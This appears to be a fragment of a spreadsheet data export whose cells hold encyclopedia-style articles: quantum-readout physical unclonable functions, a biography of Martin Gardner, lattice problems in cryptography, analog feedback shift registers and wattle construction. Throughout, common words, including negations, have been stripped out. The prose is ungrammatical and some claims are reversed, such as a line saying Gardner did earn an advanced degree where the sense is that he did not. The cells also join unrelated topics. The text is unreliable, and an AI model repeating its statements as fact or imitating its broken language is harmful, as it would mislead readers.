lower false accept probability. crucial point attacker cannot determine actual challenge information packaged "fragile" quantum state. tries investigate challenge state measuring destroys part information. knowing exactly look challenge-response database, attacker cannot reliably produce correct responses. continuous-variable quantum authentication pufs also proposed literature, relies standard wave-front shaping homodyne detection techniques. security assumptions scheme secure following conditions met, physical unclonability puf. attacker cannot perform arbitrary unitary transformations challenge quantum (i.e. physical emulation supposed infeasible).in multiple-scattering optical systems requirements practice. quantum readout pufs unconditionally secure digital emulation, conditionally physical cloning physical emulation. special security properties quantum readout pufs achieves hands-off object authentication without trusted hardware side object. authentication quantum communication channel without priori shared secrets without shared entangled particles. authentication based public information.imagine alice wish engage quantum distribution basis, i.e. without ever exchanged data matter past. they enrolled optical puf. they look other's enrollment data trusted source. they quantum distribution optical pufs; slight modification protocol, quantum distribution two-way authentication. security distribution unconditional, security authentication conditional assumptions mentioned above. security proofs security proven case challenge estimation attacks, attacker tries determine challenge best using measurements. there proofs n=1, quadrature measurements coherent states fixed number quanta n&gt;1. result dimension quanta false acceptance probability single round cannot exceed (n+1)/(n+k). security continuous-variable quantum authentication pufs emulation attack, also addressed framework holevo's bound fano's inequality, well man-in-the-middle attack.all security proofs assume tamper-resistant authentication set-up, hard justify remote authentication scenario. experimental realization quantum readout speckle-based optical pufs demonstrated lab. this realization known name quantum-secure authentication. this protocol, well protocol reference, limited short distances km), practical issues associated transmission quantum states. classical setting, encrypting entries database challenge-response pars, build protocol operates arbitrary distances, offers security classical quantum adversaries (including emulation attack). references external links http://theconversation.com/quantum-physics-can-fight-fraud-by-making-card-verification-unspoofable-35632</t>
  </si>
  <si>
    <t>Martin Gardner</t>
  </si>
  <si>
    <t>martin gardner (october 1914 2010) american popular mathematics popular science writer interests also encompassing scientific skepticism, micromagic, philosophy, religion, literature especially writings lewis carroll, frank baum, chesterton. also leading authority lewis carroll. annotated alice, incorporated text carroll's alice books, successful work sold million copies. lifelong interest magic illusion 1999, magic magazine named "100 most influential magicians twentieth century". considered doyen american puzzlers. prolific versatile author, publishing books.gardner best known creating sustaining interest recreational mathematics extension, mathematics general throughout latter half 20th century, principally "mathematical games" columns. these appeared twenty-five years scientific american, subsequent books collecting them.gardner foremost anti-pseudoscience polemicists 20th century. 1957 book fads fallacies name science, originally published 1952 name science: entertaining survey high priests cultists science, past present, became classic seminal work skeptical movement. 1976, joined fellow skeptics found csicop, organization promoting scientific inquiry reason examining extraordinary claims.he frequent contributor york review books. biography youth education martin gardner born prosperous family tulsa, oklahoma, james henry gardner, prominent petroleum geologist, wife, willie wilkerson spiers, montessori-trained teacher. mother taught martin read started school, reading wizard began lifelong interest books frank baum. fascination mathematics started boyhood father gave copy loyd's cyclopedia 5000 puzzles, tricks conundrums.he attended university chicago, earned bachelor's degree philosophy 1936. early jobs included reporter tulsa tribune, writer university chicago office press relations, case worker chicago's black belt city's relief administration. during world served four years u.s. navy yeoman board destroyer escort pope atlantic. ship still atlantic came surrender japan august 1945. after war, gardner returned university chicago. attended graduate school year there, earn advanced degree.in 1950, wrote article antioch review entitled "the hermit scientist". gardner's earliest articles junk science, 1952 much-expanded version became first published book: name science: entertaining survey high priests cultists science, past present. early career late 1940s, gardner moved york city became writer editor humpty dumpty magazine, eight years wrote features stories several children's magazines. paper-folding puzzles magazine first work scientific american. many decades, gardner, wife charlotte, sons, tom, lived hastings-on-hudson, york, earned living freelance author, publishing books several different publishers, also publishing hundreds magazine newspaper articles. year 1960 original edition best-selling book career, annotated alice. retirement death 1979, gardner left scientific american. wife charlotte moved hendersonville, north carolina. continued write math articles, sending mathematical intelligencer, math horizons, college mathematics journal, scientific american. also revised older books origami, eleusis, soma cube. charlotte died 2000 2004 gardner returned oklahoma, son, james gardner, professor education university oklahoma norman. died 2010. autobiography undiluted hocus-pocus: autobiography martin gardner published posthumously. influence martin gardner major impact mathematics second half 20th century. column lasted years read avidly generation mathematicians physicists grew years 1956 1981. writing inspired, directly indirectly, many would careers mathematics, science, related endeavors.gardner's admirers included diverse individuals auden, arthur clarke, carl sagan, isaac asimov, richard dawkins, stephen gould, entire french literary group known oulipo. salvador dalí sought discuss four-dimensional hypercubes. david auerbach wrote: case made, purely practical terms, martin gardner influential writers 20th century. popularizations science mathematical games scientific american, years wrote them, might helped create young mathematicians computer scientists single factor prior advent personal computer." colm mulcahy described "without doubt best friend mathematics ever had."gardner's column credited introducing public works problems become mainstays popular mathematics including secretary problem, conway's game life, mandelbrot fractal set, penrose tiles, public-key cryptosystems, books dewdney’s planiverse douglas hofstadter’s gödel, escher, bach. gardner instrumental spreading awareness understanding escher’s work. gardner wrote escher 1961 permission horseman tessellation upcoming column h.s.m. coxeter. escher replied, saying knew gardner author annotated alice, sent escher coxeter. correspondence gardner introducing previously unknown escher's world.his writing credited broad deep. noam chomsky wrote, "martin gardner's contribution contemporary intellectual culture unique range, insight, understanding hard questions matter." gardner repeatedly alerted public (and mathematicians) recent discoveries mathematics–recreational otherwise. addition introducing many first-rate puzzles topics penrose tiles conway's game life, equally adept writing columns traditional mathematical topics knot theory, fibonacci numbers, pascal's triangle, möbius strip, transfinite numbers, four-dimensional space, zeno's paradoxes, fermat's last theorem, four-color problem.gardner high standard writing mathematics. 2004 interview said, calculus, beyond understand papers written. consider advantage type column understand writing about, enabled write average reader could understand saying. writing popularly math, think good know much math." john horton conway called "the learned ever met." gardner's mathematical grapevine gardner maintained extensive network experts amateurs regularly exchanged information ideas. doris schattschneider would later term circle collaborators "gardner's mathematical grapevine" "mg2".gardner's role network helped facilitate several introductions fruitful collaborations. mathematicians conway, berlekamp, guy, result gardner's influence, would write winning ways mathematical plays, foundational book combinatorial game theory gardner championed. gardner also introduced conway benoit mandelbrot knew mutual interest penrose tiles. gardner's network also responsible introducing doris schattschneider marjorie rice, worked together document newly discovered pentagon tilings.gardner credited network generating material columns: "when first started column, touch mathematicians, gradually mathematicians creative field found column began corresponding interesting columns columns based material them, debt gratitude."gardner prepared columns painstaking scholarly fashion conducted copious correspondence sure everything fact-checked mathematical accuracy. communication often postcard telephone gardner kept meticulous notes everything, typically index cards. archives correspondence stored stanford university occupy linear feet shelf space. this correspondence columns rep-tiles pentominos solomon golomb; space filling curves bill gosper; aperiodic tiles roger penrose; game life invented john conway; superellipse soma cube piet hein; trapdoor functions diffie, hellman, merkle; flexagons stone, tuckerman, feynman, tukey; geometrical delights book coxeter; game invented piet hein john nash; tutte's account squaring square; many topics. wide array mathematicians, physicists, computer scientists, philosophers, magicians, artists, writers, influential thinkers counted part gardner's mathematical grapevine includes: mathematical games column quarter century gardner wrote monthly column subject recreational mathematics scientific american. began free-standing article hexaflexagons december 1956 issue. flexagons became soon people york city making them. gerry piel, publisher time, asked gardner, enough similar material make regular feature?" gardner said thought january 1957 issue contained first column, entitled "mathematical games". almost columns follow.the "mathematical games" column became popular feature magazine first thing many readers turned september 1977 scientific american acknowledged prestige popularity gardner's column moving back front magazine. 1956 1981 sporadic columns afterwards first introduction many subjects wider audience, notably: ironically, gardner problems learning calculus never took mathematics course high school. while editing humpty dumpty's magazine constructed many paper folding puzzles. magic show 1956 fellow magician royal vale heath introduced gardner intricately folded paper shapes known flexagons steered four princeton university professors invented investigated mathematical properties. subsequent article gardner wrote hexaflexagons directly column.gardner's asked favorite puzzle, gardner answered almost immediately: "the monkey coconuts". subject april 1958 games column 2001 chose make first chapter "best collection, colossal book mathematics.in 1980s "mathematical games" began appear irregularly. other authors began share column, june 1986 issue final installment title. 1981, gardner's retirement scientific american, column replaced douglas hofstadter's "metamagical themas", name anagram "mathematical games". virtually games columns collected book form starting 1959 scientific american book mathematical puzzles diversions. over next four decades fourteen books followed. donald knuth called canonical books. pseudoscience skepticism gardner uncompromising critic fringe science. book fads fallacies name science (1952, revised 1957) launched modern skeptical movement. debunked dubious movements theories including fletcherism, lamarckism, food faddism, dowsing rods, charles fort, rudolf steiner, dianetics, bates method improving eyesight, einstein deniers, flat earth theory, lost continents atlantis lemuria, immanuel velikovsky's worlds collision, reincarnation bridey murphy, wilhelm reich's orgone theory, spontaneous generation life, extra-sensory perception psychokinesis, homeopathy, phrenology, palmistry, graphology, numerology. this book subsequent efforts (science: good, bogus, 1981; order surprise, 1983, gardner's whys wherefores, 1989, etc.) provoked criticism advocates alternative science philosophy; kept running dialogues (both public private) many decades.in review science: good, bogus, stephen gould called gardner "the quack detector", writer "expunge[d] nonsense" "become priceless national resource."in 1976 gardner joined fellow skeptics philosopher paul kurtz, psychologist hyman, sociologist marcello truzzi, stage magician james randi found committee scientific investigation claims paranormal (now called committee skeptical inquiry). intellectuals including astronomer carl sagan, author biochemist isaac asimov, psychologist skinner, journalist philip klass became fellows program. from 1983 2002 wrote monthly column called "notes fringe watcher" (originally "notes psi-watcher") skeptical inquirer, organization's monthly magazine. these columns collected five books starting age: notes fringe watcher 1988.gardner relentless critic self-proclaimed israeli psychic geller wrote satirical booklets 1970s using name "uriah fuller" explained purported psychics seemingly impossible feats mentally bending spoons reading minds.martin gardner continued criticize junk science throughout life–and fearless. targets included safe subjects like astrology sightings, topics chiropractic, vegetarianism, madame blavatsky, creationism, scientology, laffer curve, christian science, hutchins-adler great books movement. last thing wrote spring 2010 month death) article excoriating "dubious medical opinions bogus science" oprah winfrey particularly support thoroughly discredited theory vaccinations cause autism; went bemoan "needless deaths children" notions likely cause.skeptical inquirer named outstanding skeptics twentieth century. 2010 posthumously honored award contributions skeptical field independent investigations group. 1982 committee skeptical inquiry awarded gardner praise reason award "heroic efforts defense reason dignity skeptical attitude", 2011 added gardner pantheon skeptics. magic martin gardner held lifelong fascination magic illusion began father demonstrated trick seemed violate physical laws. wrote magic magazine high school worked department store demonstrating magic tricks university chicago. gardner's first published writing fifteen) magic trick sphinx, official magazine society american magicians. focused mainly micromagic (table close-up magic) and, 1930s published significant number original contributions secretive field. magician turner said, encyclopedia impromptu magic, gardner wrote 1985, guaranteed show poll magicians' favorite magic books." first magic book general public, mathematics, magic mystery (dover, 1956), still considered classic field. well known innovative tapping spelling effects, without playing cards, proud effect called "wink change".many gardner's lifelong friends magicians. these included william simon introduced gardner charlotte greenwald, married 1952, vernon, jerry andrus, statistician persi diaconis, polymath raymond smullyan. gardner considered fellow magician james randi closest friend. diaconis smullyan like gardner straddled worlds mathematics magic. mathematics magic frequently intertwined gardner's work. earliest books, mathematics, magic mystery (1956), mathematically based magic tricks. mathematical magic tricks often featured "mathematical games" column–for example, august 1962 column titled variety diverting tricks collected fictitious convention magicians." from 1998 2002 wrote monthly column magic tricks called "trick month" physics teacher, journal published american association physics teachers.in 1999 magic magazine named gardner "100 most influential magicians twentieth century". 2005 received 'lifetime achievement fellowship' academy magical arts. last work published lifetime magic trick 2010 issue word ways: journal recreational linguistics. theism religion gardner raised methodist (his mother religious) rejected established religion adult. considered philosophical theist fideist. believed personal god, afterlife, prayer, rejected established religion. nevertheless, abiding fascination religious belief. autobiography, stated: "when many fans discovered believed even hoped afterlife, shocked dismayed mean bible, especially testament, book claims divinely inspired. "wholly other" transcendent intelligence, impossible understand. somehow responsible universe capable providing, inkling, afterlife."gardner described belief philosophical theism inspired works philosopher miguel unamuno. while eschewing systematic religious doctrine, retained belief god, asserting belief cannot confirmed disconfirmed reason science. time, skeptical claims communicated human beings spoken telepathic revelation miracles natural world. gardner quoted saying regarded parapsychology research paranormal tantamount "tempting god" seeking "signs wonders". stated would expect tests efficacy prayers negative, would rule priori possibility unknown paranormal forces allow prayers influence physical world.gardner wrote repeatedly public figures robert maynard hutchins, mortimer adler, william buckley, believed whether beliefs logically consistent. cases, attacked prominent religious figures mary baker eddy grounds claims unsupportable. semi-autobiographical novel flight peter fromm depicts traditionally protestant christian struggling faith, examining 20th century scholarship intellectual movements ultimately rejecting christianity remaining theist.gardner said suspected fundamental nature human consciousness knowable discoverable, unless perhaps physics profound ("underlying") quantum mechanics developed. regard, said, adherent "new mysterianism". philosophical views general described defended book whys philosophical scrivener (1983, revised 1999). annotated works gardner considered leading authority lewis carroll. annotated version alice's adventures wonderland through looking glass, explaining many mathematical riddles, wordplay, literary references found alice books, first published annotated alice (clarkson potter, 1960). sequels published annotations more annotated alice (random house, 1990), finally annotated alice: definitive edition (norton, 1999), combining notes earlier editions material. original book arose gardner found alice books "sort frightening" young, found fascinating adult. felt someone ought annotate them, suggested publisher bertrand russell asked; publisher unable past russell's secretary, gardner asked take project himself.there long annotated books written scholars scholars, gardner first write work general public, soon many writers followed lead. gardner went produce annotated editions chesterton's innocence father brown thursday, well celebrated poems including rime ancient mariner, casey bat, night before christmas, hunting snark. novels short stories gardner wrote novels. perennial books written frank baum, 1988 published visitors based characters baum's various books. gardner founding member international wizard club, winner 1971 frank baum memorial award. novel flight peter fromm (1973), reflected lifelong fascination religious belief problem faith.his short stories collected no-sided professor other tales fantasy, humor, mystery, philosophy (1987). autobiography gardner wrote undiluted hocus-pocus: autobiography martin gardner. living one-room apartment norman, oklahoma and, custom, wrote typewriter edited using scissors rubber cement. took title poem, so-called grook, good friend piet hein, perfectly expresses gardner's abiding sense mystery wonder existence. word play gardner's interest wordplay conceive magazine recreational linguistics. 1967 pitched idea greenwood periodicals nominated dmitri borgmann editor. resulting journal, word ways, carried many articles; 2013 still publishing submissions posthumously. also wrote "puzzle tale" column asimov's science fiction magazine 1977 1986. gardner member all-male literary banqueting club, trap door spiders, served basis isaac asimov's fictional group mystery solvers, black widowers. names gardner often used names. 1952, working children's magazine humpty dumpty, contributed stories written "humpty dumpty jnr". several years starting 1953 managing editor polly pigtails, magazine young girls, also wrote name. annotated casey (1967) included parody poem, attributed "nitram rendrag" (his name spelled backwards). using name "uriah fuller", wrote books attacking alleged psychic geller. later years, gardner often wrote parodies favorite poems name "armand ringer", anagram name. 1983 george groth panned gardner's book whys philosophical scrivener york review books. only last line review revealed george groth martin gardner himself.in january 1960 "mathematical games" column, gardner introduced fictitious "dr. matrix" wrote often next decades. matrix exactly name, although gardner pretend everything columns came fertile mind good doctor. then 1979 matrix published article quite respectable two-year college mathematics journal. called martin gardner: defending honor human mind contained biography gardner history "mathematical games" column. would decade martin published article mathematics journal name. philosophy mathematics gardner known sometimes controversial philosophy mathematics. wrote negative reviews mathematical experience philip davis reuben hersh what mathematics, really? hersh, critical aspects mathematical platonism, first well received mathematical community. while gardner often perceived hard-core platonist, reviews demonstrated formalist tendencies. gardner maintained views widespread among mathematicians, hersh countered experience professional mathematician speaker, case. mathematics education august 1998 edition scientific american, gardner wrote final piece scientific american titled, quarter century recreational mathematics." said, "for years done best convince educators recreational math incorporated standard curriculum. regularly introduced interest young students wonders mathematics. far, though, movement direction glacial." recalls young math teacher scolded working recreation mathematics laments wrongheaded attitude notes magazine mathematics teacher published national council teachers mathematics, specially dedicated improving mathematics instruction grades 8–14, often articles recreational topics teachers them. legacy awards numerous awards gardner received include: 1987 leroy steele prize many books articles mathematics 1971 frank baum memorial award international wizard club 1980 main-belt asteroid 2587 gardner discovered edward bowell anderson mesa station named martin gardner. 1990 allendoerfer award (along chung ronald graham) mathematical association america (maa) 1994 jpbm communications award joint policy board mathematics 1997 became fellow (class: humanities arts, section: literature) american academy arts sciences. 1998 trevor evans award 1999 listed "100 most influential magicians twentieth century" magic magazine. 2011 houdini hall honor award (posthumous) independent investigations groupthe mathematical association america established martin gardner lecture given year last mathfest, summer meeting maa. first annual lecture, recreational mathematics computer science: martin gardner's influence research, given erik demaine massachusetts institute technology saturday, august 2019, mathfest cincinnati. 2021 lecture surprising discoveries three amateur mathematicians: m.c. escher, marjorie rice, rinus roelofs virtual given doris schattschneider.there eight bricks honoring gardner paul halmos commemorative walk, installed mathematical association america (maa) conference center washington, d.c. gardner erdös number gathering gardner martin gardner continued write death 2010, community fans grew span several generations. moreover, influence broad many fans little contact other. this atlanta entrepreneur puzzle collector rodgers idea hosting weekend gathering celebrating gardner's contributions recreational mathematics, rationality, magic, puzzles, literature, philosophy. although gardner famously shy, would usually decline honor required make personal appearance, rogers persuaded attend first "gathering gardner" (g4g), held atlanta january 1993.a second get-together held 1996, gardner attendance. video made television program nature things david suzuki. featured gardner along many members circle called "martin gardner: mathemagician" broadcast march 1996. point rogers friends decided make gathering regular, bi-annual event. participants years ranged long-time gardner friends john horton conway, elwyn berlekamp, ronald graham, donald coxeter, richard guy, newcomers like mathematician mathematical artist erik demaine, mathematical video maker hart, fields medalist manjul bhargava.the program "g4g" meetings presents topics gardner written about. first gathering 1993 g4g1 1996 event g4g2. since even-numbered years, always atlanta. 2018 event g4g13. bibliography publishing career spanning years (1930-2010), gardner authored edited books countless articles, columns reviews. gardner's works non-fiction except novels flight peter fromm (1973) visitors (1998) collections short pieces magic numbers matrix (1967, 1985) no-sided professor (1987). also girl paradox divisibility rule hexapawn homicidal chauffeur problem polyabolo strong small numbers unexpected hanging paradox references sources albers, (2008). martin gardner interview five parts) editorial director albers, fifteeneightyfour: blog cambridge university press notices (2004). interview martin gardner notices ams, vol. june/july 2005, 602–611 notices (2011). memories martin gardner notices ams, vol. march 2011, antonick, gary (2014). ignited martin gardner, stewart continues illuminate york times, october 2014 auerbach, david (2013). delville tolkar: martin gardner’s “undiluted hocus-pocus” angeles review books, november 2013 news (2014). martin gardner, puzzle master extraordinaire news magazine, october 2014 bhargava, manjul (2018). interview manjul bhargava colm mulcahy, g4g13, april 2018 bellos, alex (2010). martin gardner obituary guardian, 2010 berlekamp, elwyn (2014). mathematical legacy martin gardner society industrial applied mathematics (siam), september 2014 berlekamp, elwyn john conway, richard (1982). winning ways mathematical plays academic press, isbn 0120911507. brown, emma (2010). martin gardner, prolific math science writer, dies washington post, 2010 burstein, mark, (2011). bouquet gardner: martin gardner remembered. york: lewis carroll society north america. isbn 978-0-930326-17-3. case, james (2014). martin gardner’s mathematical grapevine james case, siam news, april 2014 costello, matthew (1988). greatest puzzles time york: prentice hall press, isbn 0133649369 crease, robert (2018). martin gardner would smiled physics world: education outreach blog, april 2018 demaine (2008). edited erik demaine, martin demaine, rodgers. lifetime puzzles collection puzzles honor martin gardner's 90th birthday peters: wellesley, isbn 1568812450 dirda, michael (2009). book review michael dirda: 'when were tadpole fish' martin gardner washington post, october 2009 economist (2010). martin gardner obituary 2010 england, jason (2014). puzzling life martin gardner cosmos magazine, february 2014 friedel, frederic (2018). remembering martin gardner, 2018 gardner, martin (1998). quarter century recreational mathematics martin gardner, scientific american, august 1998 gardner, martin (2013). undiluted hocus-pocus: autobiography martin gardner princeton university press, isbn 0691159912. gardner, martin (2016). recreational mathematics piet hein piet hein website gathering gardner (2014). martin gardner magician gould, stephen (1982). quack detector york review books, february 1982 groth, george (1983). review gardner’s game york review books, december 1983 hofstadter, douglas (2010). martin gardner: major shaping force life scientific american, 2010 klarner, david (1998). mathematical recreations: collection honor martin gardner, dover publications, york, 140-166 kindley, evan (2015). down rabbit hole: rise, rise, literary annotation evan kindley, republic, september 2015 kullman, david (1997). penrose tiling miami university presented mathematical association america ohio section meeting shawnee state university, october 1997 lister, david (1995). martin gardner paperfolding british origami society, february 1995. focus (2010). remembering martin gardner (4), august/september 2010 mactutor (2010). history mathematics archive: martin gardner malkevitch, joseph (2014). magical mathematics tribute martin gardner american mathematical society, march 2014 martin, douglas (2010). martin gardner, puzzler polymath, dies york times, 2010 martin gardner mathematician (official website) mirsky, steve (2010). scholars others tribute "mathematical games" columnist martin gardner scientific american, 2010 mulcahy, colm (2013). celebrations mind honor math’s best friend, martin gardner scientific american, october 2013 mulcahy, colm (2014). martin gardner scientific american articles scientific american, october 2014 mulcahy, colm (2017). martin gardner best friend mathematics ever huffington post, january 2014 peterson, ivars (2014). honoring century martin gardner focus, newsmagazine mathematical association america, vol. oct/nov 2014 propp, james (2015). martin gardner testimonials belmont, july 2015 princeton university press reviews undiluted hocus-pocus: autobiography martin gardner richards, dana (2014). math games martin gardner still spur innovation dana richards colm mulcahy, scientific american, october 2014 richards, dana (2018). martin gardner, annotator g4g13, april 2018 video shermer, michael (1997). martin gardner 1914–2010: founder modern skeptical movement michael shermer interviews martin gardner, skeptic magazine, (1997) suzuki, david (1996). mystery magic mathematics: martin gardner friends nature things, march 1996 video teller (2014). ‘undiluted hocus-pocus,’ martin gardner york times: sunday book review, january 2014 external links official website martin gardner's awards martin gardner appreciations works martin gardner center inquiry libraries martin gardner library congress authorities, catalog records</t>
  </si>
  <si>
    <t>Lattice problem</t>
  </si>
  <si>
    <t>computer science, lattice problems class optimization problems related mathematical objects called lattices. conjectured intractability problems central construction secure lattice-based cryptosystems: lattice problems example np-hard problems shown average-case hard, providing test case security cryptographic algorithms. addition, lattice problems worst-case hard used basis extremely secure cryptographic schemes. worst-case hardness schemes makes among schemes likely secure even quantum computers. applications cryptosystems, lattices vector space (often {\displaystyle \mathbb ^{n}} free modules (often {\displaystyle \mathbb ^{n}} generally considered. problems below, assume given addition specific inputs) basis vector space norm norm usually considered euclidean norm however, norms (such also considered show variety results. {\displaystyle \lambda (l)} denote length shortest non-zero vector lattice {\displaystyle \lambda (l)=\min _{v\in l\smallsetminus \{\mathbf \}}\|v\|_{n}.} shortest vector problem (svp) svp, basis vector space norm (often given lattice must find shortest non-zero vector measured words, algorithm output non-zero vector {\displaystyle n(v)=\lambda (l)} γ-approximation version svpγ, must find non-zero lattice vector length {\displaystyle \gamma \cdot \lambda (l)} given {\displaystyle \gamma \geq hardness results exact version problem known np-hard randomized reductions.by contrast, corresponding problem respect uniform norm known np-hard. algorithms euclidean norm solve exact version euclidean norm, several different approaches known, split classes: algorithms requiring superexponential time {\displaystyle 2^{\omega (n)}} poly {\displaystyle \operatorname {poly} (n)} memory, algorithms requiring exponential time space {\displaystyle 2^{\theta (n)}} lattice dimension. former class algorithms notably includes lattice enumeration random sampling reduction, latter includes lattice sieving, computing voronoi cell lattice, discrete gaussian sampling. open problem whether algorithms solving exact exist running single exponential time {\displaystyle 2^{o(n)}} requiring memory scaling polynomially lattice dimension.to solve γ-approximation version svpγ {\displaystyle \gamma euclidean norm, best known approaches based using lattice basis reduction. large {\displaystyle \gamma =2^{\omega (n)}} lenstra–lenstra–lovász (lll) algorithm find solution time polynomial lattice dimension. smaller values {\displaystyle \gamma block korkine-zolotarev algorithm (bkz) commonly used, input algorithm (the blocksize {\displaystyle \beta determines time complexity output quality: large approximation factors {\displaystyle \gamma small block size {\displaystyle \beta suffices, algorithm terminates quickly. small {\displaystyle \gamma larger {\displaystyle \beta needed find sufficiently short lattice vectors, algorithm takes longer find solution. algorithm internally uses exact algorithm subroutine (running lattices dimension {\displaystyle \beta overall complexity closely related costs calls dimension {\displaystyle \beta gapsvp problem gapsvpβ consists distinguishing instances length shortest vector {\displaystyle larger {\displaystyle \beta {\displaystyle \beta fixed function dimension lattice {\displaystyle given basis lattice, algorithm must decide whether {\displaystyle \lambda (l)\leq {\displaystyle \lambda (l)&gt;\beta like promise problems, algorithm allowed cases. another version problem gapsvpζ, functions {\displaystyle \zeta ,\gamma input algorithm basis {\displaystyle number {\displaystyle assured vectors gram–schmidt orthogonalization length least {\displaystyle \lambda (l(b))\leq \zeta (n)} {\displaystyle 1\leq d\leq \zeta (n)/\gamma (n)} {\displaystyle dimension. algorithm must accept {\displaystyle \lambda (l(b))\leq reject {\displaystyle \lambda (l(b))\geq \gamma (n).d} large {\displaystyle \zeta (i.e. {\displaystyle \zeta (n)&gt;2^{n/2}} problem equivalent gapsvpγ preprocessing done using algorithm makes second condition (and hence, {\displaystyle \zeta redundant. closest vector problem (cvp) cvp, basis vector space metric (often given lattice well vector necessarily desired find vector closest measured {\displaystyle \gamma -approximation version cvpγ, must find lattice vector distance {\displaystyle \gamma relationship closest vector problem generalization shortest vector problem. easy show given oracle cvpγ (defined below), solve svpγ making queries oracle. naive method find shortest vector calling cvpγ oracle find closest vector work lattice vector algorithm could potentially output reduction svpγ cvpγ follows: suppose input svpγ basis lattice {\displaystyle b=[b_{1},b_{2},\ldots ,b_{n}]} consider basis {\displaystyle b^{i}=[b_{1},\ldots ,2b_{i},\ldots ,b_{n}]} {\displaystyle x_{i}} vector returned cvpγ(bi, bi). claim shortest vector {\displaystyle \{x_{i}-b_{i}\}} shortest vector given lattice. hardness results goldreich showed hardness implies hardness cvp. using tools, arora showed hard approximate within factor {\displaystyle 2^{\log ^{1-\epsilon }(n)}} unless dtime poly {\displaystyle \operatorname {np} \subseteq \operatorname {dtime} (2^{\operatorname {poly} (\log n)})} dinur strengthened giving np-hardness result {\displaystyle \epsilon =(\log \log n)^{c}} {\displaystyle c&lt;1/2} sphere decoding algorithms cvp, especially fincke pohst variant, used data detection multiple-input multiple-output (mimo) wireless communication systems (for coded uncoded signals). context called sphere decoding radius used internal many solutions.it applied field integer ambiguity resolution carrier-phase gnss (gps). called lambda method field. field, general problem referred integer least squares. gapcvp this problem similar gapsvp problem. gapsvpβ, input consists lattice basis vector {\displaystyle algorithm must answer whether following holds: lattice vector distance {\displaystyle every lattice vector distance greater {\displaystyle \beta away {\displaystyle .the opposite condition closest lattice vector distance {\displaystyle 1&lt;\lambda (l)\leq \beta hence name gapcvp. known results problem trivially contained approximation factor. schnorr, 1987, showed deterministic polynomial time algorithms solve problem {\displaystyle \beta =2^{o(n(\log \log n)^{2}/\log n)}} ajtai showed probabilistic algorithms achieve slightly better approximation factor {\displaystyle \beta =2^{o(n\log \log n/\log n)}} 1993, banaszczyk showed gapcvpn {\displaystyle {\mathsf {np\cap conp}}} 2000, goldreich goldwasser showed {\displaystyle \beta ={\sqrt {n/\log n}}} puts problem coam. 2005, aharonov regev showed constant {\displaystyle problem {\displaystyle \beta =c{\sqrt {n}}} {\displaystyle {\mathsf {np\cap conp}}} .for lower bounds, dinur showed 1998 problem np-hard {\displaystyle \beta =n^{o(1/\log {\log {n}})}} shortest independent vectors problem (sivp) given lattice dimension algorithm must output linearly independent {\displaystyle v_{1},v_{2},\ldots ,v_{n}} {\displaystyle \max \|v_{i}\|\leq \max _{b}\|b_{i}\|} right hand side considers bases {\displaystyle b=\{b_{1},\ldots ,b_{n}\}} lattice. {\displaystyle \gamma -approximate version, given lattice dimension find linearly independent vectors {\displaystyle v_{1},v_{2},\ldots ,v_{n}} length {\displaystyle \max \|v_{i}\|\leq \gamma \lambda _{n}(l)} {\displaystyle \lambda _{n}(l)} {\displaystyle successive minimum {\displaystyle bounded distance decoding this problem similar cvp. given vector distance lattice {\displaystyle \lambda (l)/2} algorithm must output closest lattice vector covering radius problem given basis lattice, algorithm must find largest distance versions, approximation) vector lattice. shortest basis problem many problems become easier input basis consists short vectors. algorithm solves shortest basis problem (sbp) must, given lattice basis {\displaystyle output equivalent basis {\displaystyle length longest vector {\displaystyle short possible. approximation version sbpγ problem consist finding basis whose longest vector {\displaystyle \gamma times longer longest vector shortest basis. cryptography average case hardness problems forms basis proofs-of-security cryptographic schemes. however, experimental evidence suggests np-hard problems lack property: probably worst case hard. many lattice problems conjectured proven average-case hard, making attractive class problems base cryptographic schemes moreover, worst-case hardness lattice problems used create secure cryptographic schemes. worst-case hardness schemes makes among schemes likely secure even quantum computers. lattice problems easy solve algorithm provided "good" basis. lattice reduction algorithms aim, given basis lattice, output basis consisting relatively short, nearly orthogonal vectors. lenstra–lenstra–lovász lattice basis reduction algorithm (lll) early efficient algorithm problem could output almost reduced lattice basis polynomial time. this algorithm refinements used break several cryptographic schemes, establishing status important tool cryptanalysis. success experimental data belief lattice reduction might easy problem practice. however, belief challenged late 1990s, several results hardness lattice problems obtained, starting result ajtai.in seminal papers, ajtai showed problem np-hard discovered connections worst-case complexity average-case complexity lattice problems. building results, ajtai dwork created public-key cryptosystem whose security could proven using worst case hardness certain version svp, thus making first result used worst-case hardness create secure systems. also learning errors short integer solution problem references further reading agrell, eriksson, vardy, zeger, (2002). "closest point search lattices". ieee trans. inf. theory. (8): 2201–2214. doi:10.1109/tit.2002.800499. micciancio, daniele (2001). "the shortest vector problem {np}-hard approximate within constant". siam journal computing. (6): 2008–2035. citeseerx 10.1.1.93.6646. doi:10.1137/s0097539700373039. s2cid 42794945. nguyen, phong stern, jacques (2000). "lattice reduction cryptology: update". proceedings international symposium algorithmic number theory. springer-verlag. 85–112. isbn 978-3-540-67695-9.</t>
  </si>
  <si>
    <t>Analog feedback shift register</t>
  </si>
  <si>
    <t>afsr also stands argonne fast source reactor list nuclear reactors. afsr also abbreviation armed forces south russia.an analog feedback shift register (afsr) generalization (binary, digital) linear-feedback shift register (lfsr). while binary lfsrs require less power generate spread spectrum signals afsrs, afsr receivers require less power theory) synchronize signals binary lfsr receivers. 2005, afsrs still research. afsr techniques could make spread-spectrum receivers (such receivers cell phones wi-fi receivers rfids) cost less longer battery lifetimes. external links nonlinear dynamic system spread spectrum code acquisition benjamin vigoda 1999 c/a-code synchronization using analog feedback shift registers (afsr) daniel megnet-kägi, 2004 pseudo-noise sequences based algebraic feedback shift registers mark goresky andrew klapper (2005??) fast acquisition receivers mathis, rapperswil 2004</t>
  </si>
  <si>
    <t>Wattle (construction)</t>
  </si>
  <si>
    <t>wattle lightweight construction material made weaving thin branches (either whole, usually split) slats upright stakes form woven lattice. commonly used make fences hurdles enclosing ground handling livestock. wattle made loose panels, slotted timber framing make infill panels, made place form whole fence wall. technique goes back neolithic times. forms substructure wattle daub, composite building material used making walls, wattle daubed sticky material usually made combination soil, clay, sand, animal dung straw. wattle daub used least 6,000 years, still important construction material many parts world. this process similar modern lath plaster, common building material wall ceiling surfaces, series nailed wooden strips covered plaster smoothed flat surface. many historic buildings include wattle daub construction, technique becoming popular developed areas low-impact sustainable building technique. square panels square panels large, wide panels used hurdles forming paneling later timber frame houses. they generally square although sometimes triangular accommodate arched decorative bracing. this style require wattles woven better support daub. construction method series evenly spaced holes drilled along middle inner face upper timber. next, continuous groove along middle inner face lower timber. vertical slender timbers, known staves, inserted hold whole panel within timber frame. staves positioned holes sprung grooves. they must placed sufficient gaps 